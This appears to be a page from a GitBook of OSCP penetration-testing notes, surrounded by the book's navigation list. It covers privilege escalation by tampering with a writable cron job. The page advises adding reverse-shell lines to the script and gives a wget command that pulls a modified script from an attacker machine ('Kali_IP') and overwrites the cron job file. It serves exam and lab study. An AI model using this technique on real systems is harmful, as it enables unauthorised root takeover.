O
O
OSCP Notes
Search
⌃K
Introduction
Port scanning
Passive Information Gathering
Ports enum:
Recon Tools
Tech Skills Needed
msfvenom
meterpreter commands
Web Apps
python scripts
Windows hacks
Port Forwarding
Reverse shells
Binary exploitation
Transfering Modules
Buffer Overflow
Cracking!
shellshock
Active Directory
Antivirus Evasion
Windows Priv Esc
Linux Priv Esc
Creating a stable (Fully-interactive shells) in linux with socat
Escape from restricted shells
dirty cow
find writable files
mount points
ifcf-<whatever> script to /etc/sysconfig/network-scripts
sudo -l wins!
no_root_squash!
SUID wins!
gcc not executing correctly
Unknown SUID binary found?
capabilities
Disk enum
Retrieve lost content
Spawning a tty shell
Priv Esc with MySQL UDF
cronjob
Active Directory Case Studies
Pivoting
C program analysis
Misc
Hack the box Write-ups
THM Offensive Security Path
Proving Ground
Cyber Sec Labs
Powered By GitBook

cronjob

Crontab.guru - The cron schedule expression editor
if you're able to modify the cronjob script, don't just replace it. keep a copy of the content and modify or add what you need. i.e) add reverse shell lines. Don't try to edit it with vim if you can just upload a new one replacing it with the exact name.
​
Transferring a modified cron job script to the target but with the same name:
wget http://Kali_IP/.modified_cronjob.py -O .cronjob.py
​
Previous
Priv Esc with MySQL UDF
Next
Active Directory Case Studies
Last modified 9mo ago
Copy link